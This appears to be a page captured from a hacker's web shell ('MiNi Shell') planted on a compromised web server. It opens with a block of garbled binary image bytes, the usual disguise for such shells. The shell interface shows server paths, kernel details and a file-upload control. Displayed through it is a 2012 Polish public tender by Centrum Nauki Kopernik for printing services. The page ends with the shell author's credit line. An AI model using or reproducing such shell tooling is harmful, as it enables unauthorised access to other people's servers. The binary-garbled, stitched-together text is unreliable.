JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120629/227658-N-2012.html

<p class="kh_header"><b>Warszawa: USŁUGI DRUKOWANIA, WRAZ ZE SKŁADEM I INTROLIGATORNIĄ, MATERIAŁÓW POLIGRAFICZNYCH NA POTRZEBY CENTRUM NAUKI KOPERNIK, NR SPRAWY: PO ZP 27 2012 CNK IS</b><br>
<b>Numer ogłoszenia: 227658 - 2012; data zamieszczenia: 29.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zawarcia umowy ramowej.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Nauki Kopernik , ul. Wybrzeże Kościuszkowskie 20, 00-390 Warszawa, woj. mazowieckie, tel. 22 596 41 11, faks 22 596 41 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopernik.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytycja Kultury wpisana do RIK prow. przez Prezydenta m.st. Warszawy pod nr. 2/06.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI DRUKOWANIA, WRAZ ZE SKŁADEM I INTROLIGATORNIĄ, MATERIAŁÓW POLIGRAFICZNYCH NA POTRZEBY CENTRUM NAUKI KOPERNIK, NR SPRAWY: PO ZP 27 2012 CNK IS.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem Zamówienia są usługi drukowania wraz ze składem i introligatornią, materiałów poligraficznych na potrzeby Centrum Nauki Kopernik tj.: 
1)	Materiały podlegające ocenie:
a)	Wizytówki - przewidywany, sumaryczny nakład około 25.000 szt. 
                            (słownie:  dwadzieścia pięć tysięcy sztuk),  trzy wzory graficzne
                            i dwie  wersje językowe, dla różnych nazwisk
Papier: karton ozdobny biały, matowy, gładki 320 g_m2 lub równoważny
Wykończenie: lakier dyspersyjny 1+0
Introligatornia: wycinane na spad
Uwagi: pakowane nazwiskami oraz wersjami językowymi po 100 szt. 
               (słownie: sto sztuk) w pudełka  kartonowe
Wzór 1 - Centrum Konferencyjne Kopernik:
Format: 90x50 mm wersja CKK
Druk: offsetowy 4+0 PANTONE
Wzór 2 - Centrum Nauki Kopernik:
Format: 85x54 mm 
Druk: offsetowy 4+0 PANTONE
Wzór 3 - Niebo Kopernika - wersja polskojęzyczna:
Format: 90x50 mm wersja Niebo Kopernika
Druk: offsetowy 5+0 PANTONE
Wzory wizytówek zawarte są w Załączniku nr 11 do SIWZ

b)	Papier firmowy A4,  I i II strona - przewidywany, sumaryczny nakład około 
                                                                  10 000 szt. (słownie: dziesięć tysięcy sztuk):
Format:  210x297 mm (A4)
Papier:  Colotech Xerox 160g_m2 lub równoważny
Wykończenie:  brak
Introligatornia:  przycięcie do formatu
Uwagi: pakowane w paczki po 500 szt.  (słownie: pięćset sztuk)
Papier firmowy I strona:
Druk: offset 4+0 PANTONE
Papier firmowy II strona
 Druk: offset 1+0 PANTONE
Wzór  strony I oraz II zawarty jest w  Załączniku nr 10 do SIWZ

c)	Koperty   -  przewidywany,  sumaryczny nakład około  8.000 szt. (słownie: osiem tysięcy sztuk):
Koperta DL (bez okienka)
Format:  220x110 mm (DL)
Druk:  offset 4+0
Papier:  biały, ozdobny 100 g_m2 lub równoważny
Wykończenie:  brak
Introligatornia:  brak
Uwagi: samoklejąca z paskiem, zamykana po długim boku. Pakowane w oryginalne	          pudełka.
Koperta C5 (bez okienka)
Format:  229x162 mm (C5)
Druk:  offset 4+0
Papier: biały, ozdobny 100 g_m2lub równoważny
Wykończenie:  brak
Introligatornia:  brak
Uwagi: samoklejąca z paskiem, zamykana po krótkim boku. Pakowane w oryginalne	          pudełka.
Koperta C4 (z okienkiem)
Format:  324x229 mm (C4)
Druk:  offset 1+0
Papier:  biały, ozdobny 100 g_m2, lub równoważny
Wykończenie:  brak
Introligatornia:  brak
Uwagi: samoklejąca z paskiem, zamykana po krótkim boku. Pakowane w oryginalne	          pudełka.
Koperta C4 (bez okienka)
Format:  324x229 mm (C4)
Druk:  offset 4+0
Papier:  biały, ozdobny 100 g_m2 lub równoważny
Wykończenie:  brak
Introligatornia:  brak
Uwagi: samoklejąca z paskiem, zamykana po krótkim boku. Pakowane w oryginalne	          pudełka.
Wzory kopert zawarte są w Załączniku nr 12 do SIWZ

d)	Teczka B4 - przewidywany nakład około 7.000 szt. (słownie: siedem tysięcy sztuk); Format arkusza:  660x500 mm
Druk:  offset 4+0
Papier:  karton mat z białym spodem  450 g_m2 lub równoważny
Wykończenie:  lakier dyspersyjny 1+0
Introligatornia: sztancowanie powierzonym wykrojnikiem, który jest w posiadaniu 			          Zamawiającego i będzie udostępniany Wykonawcy przy realizacji 			          Zamówienia Szczegółowego
Uwagi: teczka nie wymaga klejenia i składania; pakowanie po 250 szt. 
              (słownie: dwieście pięćdziesiąt sztuk)
Wzór teczki zawarty jest w Załączniku nr 13 do SIWZ.

e)	Ulotki  informacyjne -  przewidywany nakład sumaryczny około 500.000 szt. 
                                          (słownie: pięćset tysięcy sztuk): 
Ulotka trójkątna 
Format: po rozłożeniu 650x560 mm
Druk: 4+4 CMYK
Papier: G-Print 80 g_m2 lub równoważny
Wykończenie: sztancowanie oraz składanie ręczne
Introligatornia: sztancowanie
Uwaga: Wykrojnik jest w posiadaniu Zamawiającego i będzie udostępniany
               Wykonawcy przy realizacji Zamówienia Szczegółowego.
Wzór ulotki stanowi Załącznik nr 14 do SIWZ
Repertuar planetarium 
Format arkusza: 396x210 mm
Format ulotki po falcowaniu: 99x210mm 
Druk: 4+4 CMYK 
Papier: kreda mat 120 g_m2 lub równoważny
Wykończenie: lakier dyspersyjny 1+1
Introligatornia: falcowanie na 3 na W
Wzór repertuaru stanowi Załącznik nr 15 do SIWZ
Mapa - gra Bzzz!: cztery wzory graficzne w dwóch wersjach językowych;  
                                  razem 8 wzorów.
Format:  A1
Druk: 4+4 CMYK 
Papier: G-Print 120 g_m2 lub równoważny
Wykończenie: lakier zabezpieczający dyspersyjny 1+1
Introligatornia: falcowanie 1 po długim boku na pół i 4 krzyżowe do A4. 
Pakowane: po 50 szt. (słownie: pięćdziesiąt sztuk) w paczki.
Wzór mapy stanowi Załącznik nr 16 do SIWZ

f)	Broszura klejona - Raport roczny - przewidywany nakład około  20.000 szt. 
                                                                (słownie: dwadzieścia tysięcy sztuk):
Format :  200x250 mm 
 Objętość :	okładka - 4 str., środki - 55 str. + rozkładówka 1 str. skrzydełko - format 290x250,  wzór składania stanowi Załącznik nr 18 do SIWZ
Kolorystyka : środki 4+4 CMYK, okładka 4+4 CMYK
Papier: środek: Munken Polar 150g_m2 lub równoważny; 
             okładka: Munken Polar 400g_m2 lub równoważny
Oprawa: klejona
Wzór broszury - Raport roczny, stanowi Załącznik nr 17 do SIWZ

g)	Broszura szyta wraz z kopertą - przewidywany nakład około 20.000 szt. 
                                                               (słownie: dwadzieścia tysięcy sztuk)
Broszura
Format :  210x297 mm 
Objętość :	okładka - 4 str., środki - 28 str. + 2 str. skrzydełko - pierwsza strona środka 
w formacie ok.410x297mm po złożeniu ok. 205x297mm. 
Kolorystyka; środki 5+5 (CMYK + pantone 286), okładka 1+5   
Papier: środki offset edixion 170 g_m2, okładka offset edixion 250 g_m2
               lub równoważne
Oprawa: zeszytowa po dłuższym boku 
Inne:  druk z użyciem rastra stochastycznego.
Koperta do broszury:
Papier:  edixion 300 g_m2 lub równoważny
Format:  wg mockupu, ma się zmieścić powyższa książeczka - Raport Roczny.
Inne:  do Wykonawcy należeć będzie zaprojektowanie i sporządzenie wykrojnika, sztancowanie, klejenie
Wzór broszury stanowi Załącznik nr 19 do SIWZ

2)	Publikacje nie oceniane:
a)	książki w oprawie sztywnej lub miękkiej, dodatkowo opcja oprawy ekskluzywnej introligatorskiej, przewidywany nakład około 30.000 szt. (słownie: trzydzieści tysięcy sztuk)
b)	zaproszenia, pocztówki cięte na spad lub sztancowane - przewidywany nakład sumaryczny około 18.000 szt. (słownie: osiemnaście tysięcy sztuk)
c)	druk raportów rocznych - przewidywany nakład około 4.000 szt. (słownie: cztery tysiące sztuk)
d)	opakowania detaliczne, w tym z tektury falistej (mikrofali), kartonu lub kartonu kaszerowanego, nakład około 1.500 szt. (słownie: tysiąc pięćset sztuk)
Przedmiot Zamówienia (rodzaj papieru, technologia druku, kolorystyka, rodzaje czcionek, projekty graficzne, itd.), ilości (nakład) oraz termin realizacji, zostaną szczegółowo określone 
w momencie przystąpienia przez Zamawiającego do udzielania zamówienia publicznego, o którym mowa w art. 101 ust. 1 Ustawy. 

II. Zamawiający zastrzega sobie prawo do zwiększenia lub zmniejszenia nakładów materiałów, o których mowa w pkt. 1) powyżej, w zależności od bieżących potrzeb Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w tym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w okresie ostatnich 3 lat przed wszczęciem Postępowania (a jeżeli okres działalności jest krótszy - w tym okresie), na podstawie odrębnych umów, należycie wykonali co najmniej trzy usługi o podobnym charakterze tj. świadczyli usługi drukowania wraz ze składem i introligatornią, materiałów poligraficznych,  o wartości nie mniejszej niż 200.000,00 PLN netto (słownie dwieście tysięcy netto złotych) łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zakład (drukarnia) powinna być wyposażona 
w co najmniej: maszynę offsetową czterokolorową minimum pół format, falcerkę kasetową z perforatorem lub bigówkę rotacyjną z perforatorem; gilotynę, zbieraczkę lub personel wykonujący czynności tego urządzenia; zszywarkę; oklejarkę termiczną lub introligatornię.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają środki finansowe na rachunku lub zdolność kredytową 
nie mniejszą niż 100 000,00 PLN (słownie: sto tysięcy złotych)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 Ustawy
2. Zamawiający zaleca, aby Wykonawca, jako osoba fizyczna prowadząca działalność gospodarczą, załączył  do Oferty aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej lub inny dokument, z którego wynika prawo do podpisania Oferty.
3. Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w Postępowaniu na potencjał Podmiotów Innych, na podstawie art. 26 ust. 1 pkt. 2b Ustawy, które będą brały udział w realizacji części Zamówienia, przedkłada pisemne zobowiązanie tych Podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu Zamówienia.  Oświadczenie podmiotu trzeciego, aby mogło być uznane za dowód potwierdzający dysponowanie zasobami tego podmiotu, musi zatem posiadać zarówno stosowną treść, z której będzie wynikało, że podmiot ten zobowiązał się do udostępnienia Wykonawcy określonych zasobów na okres korzystania z nich przy wykonaniu zamówienia, jak i formę pisemną oraz dla swej skuteczności musi także zostać złożone przez osobę/osoby uprawnione do reprezentowania podmiotu trzeciego w powyższym zakresie. Mając na uwadze powyższe, w przypadku złożenia zobowiązania podmiotu trzeciego, Wykonawca zobowiązany jest również do złożenia dowodów, że osoba podpisująca takie zobowiązanie, była uprawniona do działania w imieniu podmiotu trzeciego (dokumenty uprawniające do reprezentacji).
4. W sytuacji, gdy Wykonawca powołuje się na sytuację finansową innego podmiotu, Zamawiający wymaga przedłożenia informacji z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Podmiot Inny posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową tego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania  ofert
5. Pełnomocnictwo (o ile dotyczy)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - termin realizacji zamówienia - 15</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a.	w przypadku wprowadzenia zmian w layoucie informacji wizualnej polegających np. na wprowadzaniu nowych znaków towarowych, zmian w kolorystyce, Zamawiający zastrzega sobie prawo do zmiany danych osobowych, fotografii i układu druku, a także kolorystyki wydruków w stosunku do przykładowych wzorów druków, stanowiących Załączniki nr 10 -19 do SIWZ
b.	w momencie udzielania Zamówień Szczegółowych na podstawie Umowy ramowej Zamawiający zastrzega sobie prawo do zwiększenia lub zmniejszenia nakładów poszczególnych rodzajów druków, wyszczególnionych w pkt. 10.1 SIWZ
c.	gdy konieczność wprowadzenia zmian będzie następstwem zmiany stawki VAT, przy czym zmianie ulegnie stawka VAT i wynagrodzenie brutto.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.kopernik.org.pl/nc/o-centrum/zamowienia-publiczne/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> u Pani Izabelli Starzyńskiej, biuro Centrum Nauki Kopernik, ul. Dobra 56/66, 00-312 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2012 godzina 14:00, miejsce: siedziba Centrum Nauki Kopernik, ul. Wybrzeże Kościuszkowskie 20, 00-390 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W związku z tym, iż Postępowanie jest prowadzone w celu zawarcia umowy ramowej, nie zaś na wykonanie konkretnego Zamówienia Szczegółowego, udzielanego na jej podstawie,   kryterium Termin realizacji zamówienia w niniejszym Postępowaniu nie będzie miało zastosowania. W związku z tym każdy Wykonawca, w tym kryterium, otrzyma 0 (zero) punktów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com